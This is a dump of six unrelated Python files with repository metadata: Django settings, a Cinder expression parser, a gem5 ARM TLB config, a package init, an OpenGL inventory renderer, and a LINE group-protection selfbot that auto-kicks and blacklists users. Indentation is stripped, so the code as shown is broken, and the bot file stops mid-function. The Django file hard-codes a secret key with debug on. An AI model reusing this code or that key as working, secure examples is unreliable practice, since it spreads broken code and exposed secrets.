db_table = 'sysdiagrams'
unique_together = (('principal_id', 'name'),)
avg_line_length: 38.682051 | max_line_length: 129 | alphanum_fraction: 0.713907

hexsha: c26f3248ed5b38c4b1da306d1e4df1b5d90b9e7c | size: 3121 | ext: py | lang: Python
max_stars_repo: path app/app/settings.py, name stevie38mwenje/recipe, head_hexsha 623038b47844000acee0053dcf3edff69822b1b8, licenses ["MIT"], count null, events null
max_issues_repo: path app/app/settings.py, name stevie38mwenje/recipe, head_hexsha 623038b47844000acee0053dcf3edff69822b1b8, licenses ["MIT"], count null, events null
max_forks_repo: path app/app/settings.py, name stevie38mwenje/recipe, head_hexsha 623038b47844000acee0053dcf3edff69822b1b8, licenses ["MIT"], count null, events null
content:
"""
Django settings for app project.
Generated by 'django-admin startproject' using Django 3.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '5%eeq_uv^3co6b9j-e7_^3t7t+h2h7cwr-xzq0)@962@_htjl+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
"core",
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = "core.User"
avg_line_length: 25.373984 | max_line_length: 91 | alphanum_fraction: 0.69497

hexsha: 47887f3edc2b0b1aa790c3f6c2084fe4076b9ad4 | size: 7831 | ext: py | lang: Python
max_stars_repo: path cinder/scheduler/evaluator/evaluator.py, name mail2nsrajesh/cinder, head_hexsha a688b872bec6d1abd4dcd852bdb8e8a921369d2e, licenses ["Apache-2.0"], count null, events null
max_issues_repo: path cinder/scheduler/evaluator/evaluator.py, name mail2nsrajesh/cinder, head_hexsha a688b872bec6d1abd4dcd852bdb8e8a921369d2e, licenses ["Apache-2.0"], count 2, events 2018-10-25T13:04:01.000Z to 2019-08-17T13:15:24.000Z
max_forks_repo: path cinder/scheduler/evaluator/evaluator.py, name mail2nsrajesh/cinder, head_hexsha a688b872bec6d1abd4dcd852bdb8e8a921369d2e, licenses ["Apache-2.0"], count 2, events 2018-10-17T13:32:50.000Z to 2018-11-08T08:39:39.000Z
content:
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import operator
import re
import pyparsing
import six
from cinder import exception
from cinder.i18n import _
def _operatorOperands(tokenList):
it = iter(tokenList)
while True:
try:
op1 = next(it)
op2 = next(it)
yield(op1, op2)
except StopIteration:
break
class EvalConstant(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
result = self.value
if (isinstance(result, six.string_types) and
                re.match(r"^[a-zA-Z_]+\.[a-zA-Z_]+$", result)):
(which_dict, entry) = result.split('.')
try:
result = _vars[which_dict][entry]
except KeyError as e:
raise exception.EvaluatorParseException(
_("KeyError: %s") % e)
except TypeError as e:
raise exception.EvaluatorParseException(
_("TypeError: %s") % e)
try:
result = int(result)
except ValueError:
try:
result = float(result)
except ValueError as e:
raise exception.EvaluatorParseException(
_("ValueError: %s") % e)
return result
class EvalSignOp(object):
operations = {
'+': 1,
'-': -1,
}
def __init__(self, toks):
self.sign, self.value = toks[0]
def eval(self):
return self.operations[self.sign] * self.value.eval()
class EvalAddOp(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
sum = self.value[0].eval()
for op, val in _operatorOperands(self.value[1:]):
if op == '+':
sum += val.eval()
elif op == '-':
sum -= val.eval()
return sum
class EvalMultOp(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
prod = self.value[0].eval()
for op, val in _operatorOperands(self.value[1:]):
try:
if op == '*':
prod *= val.eval()
elif op == '/':
prod /= float(val.eval())
except ZeroDivisionError as e:
raise exception.EvaluatorParseException(
_("ZeroDivisionError: %s") % e)
return prod
class EvalPowerOp(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
prod = self.value[0].eval()
for op, val in _operatorOperands(self.value[1:]):
prod = pow(prod, val.eval())
return prod
class EvalNegateOp(object):
def __init__(self, toks):
self.negation, self.value = toks[0]
def eval(self):
return not self.value.eval()
class EvalComparisonOp(object):
operations = {
"<": operator.lt,
"<=": operator.le,
">": operator.gt,
">=": operator.ge,
"!=": operator.ne,
"==": operator.eq,
"<>": operator.ne,
}
def __init__(self, toks):
self.value = toks[0]
def eval(self):
val1 = self.value[0].eval()
for op, val in _operatorOperands(self.value[1:]):
fn = self.operations[op]
val2 = val.eval()
if not fn(val1, val2):
break
val1 = val2
else:
return True
return False
class EvalTernaryOp(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
condition = self.value[0].eval()
if condition:
return self.value[2].eval()
else:
return self.value[4].eval()
class EvalFunction(object):
functions = {
"abs": abs,
"max": max,
"min": min,
}
def __init__(self, toks):
self.func, self.value = toks[0]
def eval(self):
args = self.value.eval()
if type(args) is list:
return self.functions[self.func](*args)
else:
return self.functions[self.func](args)
class EvalCommaSeperator(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
val1 = self.value[0].eval()
val2 = self.value[2].eval()
if type(val2) is list:
val_list = []
val_list.append(val1)
for val in val2:
val_list.append(val)
return val_list
return [val1, val2]
class EvalBoolAndOp(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
left = self.value[0].eval()
right = self.value[2].eval()
return left and right
class EvalBoolOrOp(object):
def __init__(self, toks):
self.value = toks[0]
def eval(self):
left = self.value[0].eval()
right = self.value[2].eval()
return left or right
_parser = None
_vars = {}
def _def_parser():
# Enabling packrat parsing greatly speeds up the parsing.
pyparsing.ParserElement.enablePackrat()
alphas = pyparsing.alphas
Combine = pyparsing.Combine
Forward = pyparsing.Forward
nums = pyparsing.nums
oneOf = pyparsing.oneOf
opAssoc = pyparsing.opAssoc
operatorPrecedence = pyparsing.operatorPrecedence
Word = pyparsing.Word
integer = Word(nums)
real = Combine(Word(nums) + '.' + Word(nums))
variable = Word(alphas + '_' + '.')
number = real | integer
expr = Forward()
fn = Word(alphas + '_' + '.')
operand = number | variable | fn
signop = oneOf('+ -')
addop = oneOf('+ -')
multop = oneOf('* /')
comparisonop = oneOf(' '.join(EvalComparisonOp.operations.keys()))
ternaryop = ('?', ':')
boolandop = oneOf('AND and &&')
boolorop = oneOf('OR or ||')
negateop = oneOf('NOT not !')
operand.setParseAction(EvalConstant)
expr = operatorPrecedence(operand, [
(fn, 1, opAssoc.RIGHT, EvalFunction),
("^", 2, opAssoc.RIGHT, EvalPowerOp),
(signop, 1, opAssoc.RIGHT, EvalSignOp),
(multop, 2, opAssoc.LEFT, EvalMultOp),
(addop, 2, opAssoc.LEFT, EvalAddOp),
(negateop, 1, opAssoc.RIGHT, EvalNegateOp),
(comparisonop, 2, opAssoc.LEFT, EvalComparisonOp),
(ternaryop, 3, opAssoc.LEFT, EvalTernaryOp),
(boolandop, 2, opAssoc.LEFT, EvalBoolAndOp),
(boolorop, 2, opAssoc.LEFT, EvalBoolOrOp),
(',', 2, opAssoc.RIGHT, EvalCommaSeperator), ])
return expr
def evaluate(expression, **kwargs):
"""Evaluates an expression.
Provides the facility to evaluate mathematical expressions, and to
substitute variables from dictionaries into those expressions.
Supports both integer and floating point values, and automatic
promotion where necessary.
"""
global _parser
if _parser is None:
_parser = _def_parser()
global _vars
_vars = kwargs
try:
result = _parser.parseString(expression, parseAll=True)[0]
except pyparsing.ParseException as e:
raise exception.EvaluatorParseException(
_("ParseException: %s") % e)
return result.eval()
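# A minimal usage sketch (illustrative only, not part of the original module; the
# expressions and the 'stats' dictionary below are made up):
#
#   evaluate("max(stats.free, 10) * 2", stats={'free': 7})   # -> 20
#   evaluate("stats.free > 5", stats={'free': 7})            # -> True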
avg_line_length: 26.278523 | max_line_length: 78 | alphanum_fraction: 0.569148

hexsha: b3f711d831c9ff76e549194360d55675424d86f7 | size: 4232 | ext: py | lang: Python
max_stars_repo: path src/arch/arm/ArmTLB.py, name fusiled/gem5, head_hexsha 670436b9cd7a23f03c9d7248abb8eb19939c83a6, licenses ["BSD-3-Clause"], count 22, events 2018-07-03T16:46:51.000Z to 2022-03-22T08:29:36.000Z
max_issues_repo: path src/arch/arm/ArmTLB.py, name fusiled/gem5, head_hexsha 670436b9cd7a23f03c9d7248abb8eb19939c83a6, licenses ["BSD-3-Clause"], count 1, events 2022-02-21T07:56:08.000Z to 2022-02-21T07:56:18.000Z
max_forks_repo: path src/arch/arm/ArmTLB.py, name fusiled/gem5, head_hexsha 670436b9cd7a23f03c9d7248abb8eb19939c83a6, licenses ["BSD-3-Clause"], count 25, events 2017-12-02T00:46:04.000Z to 2022-02-18T19:28:53.000Z
content:
# -*- mode:python -*-
# Copyright (c) 2009, 2013, 2015 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ali Saidi
from m5.SimObject import SimObject
from m5.params import *
from m5.proxy import *
from MemObject import MemObject
# Basic stage 1 translation objects
class ArmTableWalker(MemObject):
type = 'ArmTableWalker'
cxx_class = 'ArmISA::TableWalker'
cxx_header = "arch/arm/table_walker.hh"
is_stage2 = Param.Bool(False, "Is this object for stage 2 translation?")
num_squash_per_cycle = Param.Unsigned(2,
"Number of outstanding walks that can be squashed per cycle")
    # The port to the memory system. This port ultimately belongs to the
    # Stage2MMU and is shared by the two table walkers, but we access it
    # through the ITB and DTB walker objects in the CPU for symmetry with
    # the other ISAs.
port = MasterPort("Port used by the two table walkers")
sys = Param.System(Parent.any, "system object parameter")
class ArmTLB(SimObject):
type = 'ArmTLB'
cxx_class = 'ArmISA::TLB'
cxx_header = "arch/arm/tlb.hh"
sys = Param.System(Parent.any, "system object parameter")
size = Param.Int(64, "TLB size")
walker = Param.ArmTableWalker(ArmTableWalker(), "HW Table walker")
is_stage2 = Param.Bool(False, "Is this a stage 2 TLB?")
# Stage 2 translation objects, only used when virtualisation is being used
class ArmStage2TableWalker(ArmTableWalker):
is_stage2 = True
class ArmStage2TLB(ArmTLB):
size = 32
walker = ArmStage2TableWalker()
is_stage2 = True
class ArmStage2MMU(SimObject):
type = 'ArmStage2MMU'
cxx_class = 'ArmISA::Stage2MMU'
cxx_header = 'arch/arm/stage2_mmu.hh'
tlb = Param.ArmTLB("Stage 1 TLB")
stage2_tlb = Param.ArmTLB("Stage 2 TLB")
sys = Param.System(Parent.any, "system object parameter")
class ArmStage2IMMU(ArmStage2MMU):
# We rely on the itb being a parameter of the CPU, and get the
# appropriate object that way
tlb = Parent.itb
stage2_tlb = ArmStage2TLB()
class ArmStage2DMMU(ArmStage2MMU):
# We rely on the dtb being a parameter of the CPU, and get the
# appropriate object that way
tlb = Parent.dtb
stage2_tlb = ArmStage2TLB()
avg_line_length: 42.32 | max_line_length: 77 | alphanum_fraction: 0.750709

hexsha: 7bfc9ca131c13653d0ed2f1b3ff098871c043914 | size: 101 | ext: py | lang: Python
max_stars_repo: path wiretap/__init__.py, name karthicraghupathi/django_rapyd_wiretap, head_hexsha 9382d6e2e3d719e9635eb6300f0f224c69aee40d, licenses ["Apache-2.0"], count null, events null
max_issues_repo: path wiretap/__init__.py, name karthicraghupathi/django_rapyd_wiretap, head_hexsha 9382d6e2e3d719e9635eb6300f0f224c69aee40d, licenses ["Apache-2.0"], count null, events null
max_forks_repo: path wiretap/__init__.py, name karthicraghupathi/django_rapyd_wiretap, head_hexsha 9382d6e2e3d719e9635eb6300f0f224c69aee40d, licenses ["Apache-2.0"], count 1, events 2022-03-10T15:41:10.000Z to 2022-03-10T15:41:10.000Z
content:
__version__ = "0.0.5"
import logging
logging.getLogger(__name__).addHandler(logging.NullHandler())
avg_line_length: 16.833333 | max_line_length: 61 | alphanum_fraction: 0.782178

hexsha: 67e1c641c06f51b8a9f9b4d0adbbc71d4889beb3 | size: 1935 | ext: py | lang: Python
max_stars_repo: path gui/invRender.py, name C1ffisme/pyopengl-sandbox, head_hexsha 38b07ef50e7642be44a571a8768aa4ac749bde89, licenses ["MIT"], count 4, events 2018-07-03T16:51:17.000Z to 2021-12-10T09:18:56.000Z
max_issues_repo: path gui/invRender.py, name C1ffisme/pyopengl-sandbox, head_hexsha 38b07ef50e7642be44a571a8768aa4ac749bde89, licenses ["MIT"], count null, events null
max_forks_repo: path gui/invRender.py, name C1ffisme/pyopengl-sandbox, head_hexsha 38b07ef50e7642be44a571a8768aa4ac749bde89, licenses ["MIT"], count 1, events 2021-12-10T08:47:53.000Z to 2021-12-10T08:47:53.000Z
content:
import numpy
import math
import inventory
def create_inventory(width, height, display, inv=[]):
gui_height = 0.7
gui_width = 0.7
gui_v = numpy.array([-gui_width,-gui_height,0.1, -gui_width, gui_height,0.1, gui_width,-gui_height,0.1, -gui_width,gui_height,0.1, gui_width,-gui_height,0.1, gui_width,gui_height,0.1], numpy.float32)
gui_c = numpy.array([0.4,0.4,0.4, 0.4,0.4,0.4, 0.4,0.4,0.4, 0.4,0.4,0.4, 0.4,0.4,0.4, 0.4,0.4,0.4], numpy.float32)
slot_size = 0.2
margin_size = 0.1
half_height = float(height)/2.0
half_width = float(width)/2.0
flo_h = math.floor(half_height)
flo_w = math.floor(half_width)
if flo_h == 0:
flo_h = 1
if flo_w == 0:
flo_w = 1
inv_x = 0
for row in range(-int(math.floor(half_height)), int(math.ceil(half_height))):
inv_y = 0
for column in range(-int(math.floor(half_width)), int(math.ceil(half_width))):
gui_v = numpy.append(gui_v, [(gui_width-margin_size)*(column)/flo_w,(gui_height-margin_size)*(row)/flo_h,0])
gui_v = numpy.append(gui_v, [(gui_width-margin_size)*(column)/flo_w + slot_size,(gui_height-margin_size)*(row)/flo_h,0])
gui_v = numpy.append(gui_v, [(gui_width-margin_size)*(column)/flo_w,(gui_height-margin_size)*(row)/flo_h + slot_size,0])
gui_v = numpy.append(gui_v, [(gui_width-margin_size)*(column)/flo_w + slot_size,(gui_height-margin_size)*(row)/flo_h + slot_size,0])
gui_v = numpy.append(gui_v, [(gui_width-margin_size)*(column)/flo_w + slot_size,(gui_height-margin_size)*(row)/flo_h,0])
gui_v = numpy.append(gui_v, [(gui_width-margin_size)*(column)/flo_w,(gui_height-margin_size)*(row)/flo_h + slot_size,0])
if inv == []:
gui_c = numpy.append(gui_c, [0.7,0.7,0.7, 0.7,0.7,0.7, 0.7,0.7,0.7, 0.7,0.7,0.7, 0.7,0.7,0.7, 0.7,0.7,0.7])
else:
for i in range(0,6):
gui_c = numpy.append(gui_c, [inventory.get_inv_image(inv[inv_x][inv_y][0])])
inv_y += 1
inv_x += 1
return gui_v, gui_c
avg_line_length: 37.211538 | max_line_length: 201 | alphanum_fraction: 0.672351

hexsha: 745fbbb997cacde727d1f60dda52ee65279e7072 | size: 61247 | ext: py | lang: Python
max_stars_repo: path Classclient.py, name ehunaj/cl1, head_hexsha c9054d34177070c2c43d65c4eee553271decbe13, licenses ["BSD-3-Clause"], count null, events null
max_issues_repo: path Classclient.py, name ehunaj/cl1, head_hexsha c9054d34177070c2c43d65c4eee553271decbe13, licenses ["BSD-3-Clause"], count null, events null
max_forks_repo: path Classclient.py, name ehunaj/cl1, head_hexsha c9054d34177070c2c43d65c4eee553271decbe13, licenses ["BSD-3-Clause"], count null, events null
content:
# -*- coding: utf-8 -*-
# Support ===ZNF TEAM BOTZ===
from Dit.linepy import *
from akad.ttypes import *
import time, asyncio, json, threading, codecs, sys, os, re, urllib, requests, subprocess, traceback, random, ast
from datetime import datetime  # datetime is used by logError(); ast is used by the mention-parsing commands below
from Naked.toolshed.shell import execute_js
from bs4 import BeautifulSoup
creator = ["u9d79f5031bc4c73a5054aa8b26c9d0c2"]
helpMessage ="""
_.key_
_.add owner_
_.del owner_
_.add admin_
_.del admin_
_.add staff_
_.del staff_
_.cban_
_.autojoin on:off_
_.add on:off_
_.kick @_
_.sp_
_.runtime_
_.bye_
_.rechat_
"""
with open('pro.json', 'r') as fp:
pro = json.load(fp)
with open('org.json', 'r') as fp:
org = json.load(fp)
with open('wait2.json', 'r') as fp:
wait2 = json.load(fp)
mulai = time.time()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
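# Worked example (added for illustration, not in the original source): waktu(90061)
# returns '01 Hari 01 Jam 01 Menit 01 Detik', since 90061 s = 1 day + 1 hour + 1 minute + 1 second.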
def logError(text):
cl.log("[ ERROR ] " + str(text))
time_ = datetime.now()
with open("errorLog.txt","a") as error:
        error.write("\n[%s] %s" % (str(time_), text))
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","?","???:","???:","????","????"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes._from = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
class LineBot(object):
def __init__(self, resp, authQR=None):
self.resp = resp
self.resp = self.resp+' '
self.authQR = authQR
self.login(authQR)
self.fetch()
def AutoSave(self,op):
msg = op.message
self.client.unsend2(msg,self.wait)
self.client.fancyfancy(self.wait)
with open(self.anus, 'w') as fp:
json.dump(self.wait, fp, sort_keys=True, indent=4, ensure_ascii=False)
def login(self, auth):
if auth == None:
self.client = LINE()
else:
self.client = LINE(auth)
self.client.log("Auth Token : " + str(self.client.authToken))
self.mid = self.client.getProfile().mid
def fetch(self):
while True:
try:
self.operations = self.client.poll.fetchOperations(self.client.revision, 50)
for op in self.operations:
if (op.type != OpType.END_OF_OPERATION):
self.client.revision = max(self.client.revision, op.revision)
self.bot(op)
self.AutoSave(op)
except:
pass
def bot(self, op):
cl = self.client
wait = wait2
try:
if op.type == 0 or op.type == 50:
return
if op.type == 13:
if self.mid in op.param3:
if wait2["autoJoin"] == True:
if op.param2 not in creator and op.param2 not in org["owner"]:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"hi mem " + str(ginfo.name))
cl.sendMessage(op.param1,"Bukan Owner ia... Balik lagi ah??\nn Bye..")
cl.leaveGroup(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
                            cl.getGroup(op.param1)
if op.param3 in org["owner"] and op.param3 in creator and op.param3 in org["admin"] and op.param3 in org["staff"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w',) as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
cl.cancelGroupInvitation(op.param1,[op.param2])
if self.mid in op.param3:
if op.param2 in org["owner"] or op.param2 in org["staff"]:
cl.acceptGroupInvitation(op.param1)
if op.type == 13:
if op.param2 in wait2["blacklist"]:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.cancelGroupInvitation(op.param1,[op.param3])
except:
pass
if op.param1 in pro["Proinvite"]:
if op.param2 in creator or op.param2 in org["owner"] or op.param2 in org["admin"] or op.param2 in org["staff"]:
pass
else:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
group = cl.getContact(op.param3)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
if _mid in op.param3:
cl.cancelGroupInvitation(op.param1,[_mid])
if op.type == 13:
if op.param3 in wait2["blacklist"]:
if op.param2 in creator or op.param2 in org["owner"] or op.param2 in org["admin"] or op.param2 in org["staff"]:
pass
else:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
cl.cancelGroupInvitation(op.param1,[op.param3])
if op.type == 19:
if op.param1 in pro["Autokick"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
if op.param3 not in wait2["blacklist"]:
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
if op.param3 in creator:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.acceptGroupInvitation(op.param1)
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
if op.param3 in org["owner"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.acceptGroupInvitation(op.param1)
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
if op.param3 in org["admin"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
if op.param3 in org["staff"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
if op.type == 0:
return
if op.type == 5:
cl.findAndAddContactsByMid(op.param1)
if(wait2["message"]in[""," ","\n",None]):
pass
else:
cl.sendMessage(op.param1,str(wait2["message"]))
if op.type == 15:
if op.param1 in wait2["bymsg"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
return
else:
cl.sendText(op.param1, wait2["leftmsg"])
print ("MEMBER HAS LEFT THE GROUP")
if op.type == 17:
if op.param2 in wait2["blacklist"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
cl.kickoutFromGroup(op.param1,[op.param2])
if op.type == 32:
if op.param1 in pro["Procancel"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.kickoutFromGroup(op.param1,[op.param2])
if op.param3 not in wait2["blacklist"]:
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
if wait2["Jscancel"] == True:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
user = cl.getContact(op.param2)
cl.sendMessage(op.param2,"jangan di cancel woooii.. " + str(user.displayName))
try:
if op.param3 in org["owner"]:
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 in creator:
cl.inviteIntoGroup(op.param1,[op.param3])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
if op.type == 11:
if op.param1 in pro["Proqr"]:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
wait2["blacklist"][op.param2] = True
with open('wait2.json','w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.reissueGroupTicket(op.param1)
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = True
cl.updateGroup(G)
cl.kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait2["blacklist"]:
if op.param2 not in creator and op.param2 not in org["owner"] and op.param2 not in org["admin"] and op.param2 not in org["staff"]:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
cl.reissueGroupTicket(op.param1)
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = True
cl.updateGroup(G)
cl.kickoutFromGroup(op.param1,[op.param2])
if op.type == 11:
if op.param1 in pro["Proname"]:
if op.param2 in creator or op.param2 in org["owner"] or op.param2 in org["admin"] or op.param2 in org["staff"]:
pass
else:
g = cl.getGroup(op.param1)
g.name = pro["gname"][op.param1]
cl.updateGroup(g)
if op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
                if msg.toType == 0:
if sender != cl.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if msg.contentType == 0:
if text is None:
return
if msg.contentType == 13:
if msg._from in creator:
if wait2["addowner"] == True:
if msg.contentMetadata["mid"] in org["owner"]:
cl.sendMessage(msg.to, "was owner")
else:
org["owner"][msg.contentMetadata["mid"]] = True
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
